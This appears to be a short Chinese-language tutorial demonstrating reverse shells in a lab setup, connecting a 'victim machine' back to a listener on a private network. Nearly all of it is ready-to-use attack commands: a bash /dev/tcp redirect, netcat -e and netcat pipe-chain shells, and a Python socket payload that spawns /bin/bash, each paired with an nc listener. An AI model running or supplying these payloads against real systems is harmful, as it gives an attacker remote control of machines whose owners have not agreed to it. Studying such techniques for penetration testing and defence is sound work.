0x01

受害機命令
bash -i >& /dev/tcp/x.x.x.x/1234 0>&1

本機命令
nc -lvvvp 1234

首先在受害機（192.168.80.133）中開一個終端，輸入

bash -i >& /dev/tcp/192.168.80.134/1234 0>&1

然后再本機（192.168.80.134）中開個終端，界面如下

輸入如下命令

nc -lvvvp 1234

可以看到終端的標簽已經(jīng)改變了，嘗試輸入命令可以發(fā)現(xiàn)已經(jīng)得到了一個shell

0x02 netcat

如果目標主機有nc -e選項的話，也可以通過-e進行反彈shell
還是以剛才的環(huán)境來做實驗
首先，在本機上輸入

nc -lvvp 1234

進行監(jiān)聽
然后再受害機輸入

nc -e /bin/bash 192.168.80.134 1234

發(fā)現(xiàn)在本機的終端已經(jīng)可以執(zhí)行shell了

但是萬一沒有-e選項呢，那么還可以用管道進行反彈shell
首先在本機開兩個端口監(jiān)聽

nc -lvvvp 1234
nc -lvvvp 4321

然后受害機輸入

nc 192.168.80.134 1234 | /bin/bash | nc 192.168.80.134 4321

得到shell

0x03 Python

python -c 
'
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.80.134",1234));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1); 
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/bash","-i"]);
'

首先在本機輸入

nc -lvvvp 1234

在受害機輸入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.80.134",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

即可看到反彈了一個shell